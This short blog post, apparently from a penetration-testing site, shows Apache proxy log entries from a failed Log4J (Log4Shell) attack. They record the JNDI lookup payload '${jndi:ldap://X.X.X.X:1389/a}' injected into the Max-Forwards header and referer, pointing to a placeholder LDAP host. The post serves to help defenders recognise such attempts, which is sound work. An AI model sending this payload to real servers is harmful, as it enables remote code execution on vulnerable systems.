^

How does a Fail Log4J Attack look in Logfiles

Article 169 in Penetration-Testing

2022-01-29 22:55:42 from bugfish
How does a Fail Log4J Attack look in Logfiles
Penetration-Testing / Vulnerabilities
Last Review on: 2022-05-23 11:04:31 | Hits: 182

[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value '${jndi:ldap://X.X.X.X:1389/a}' could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a}
[Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request header could not be parsed returned by /index.php, referer: ${jndi:ldap://X.X.X.X:1389/a}

Image for Thumbnail:

I do not guarantee the reliability of the information given here, the code described on this page is executed at your own risk and in the event of damage or other unforeseeable consequences I am in no way responsible or liable.
Currently 0 Upvotes!
captcha image
System - 2022-01-29 22:55:48
We appreciate comments on our site!
Theme
Switch: 155 | Arrive: 180
This Website is using Session Cookies for Site Functionality and AWStats.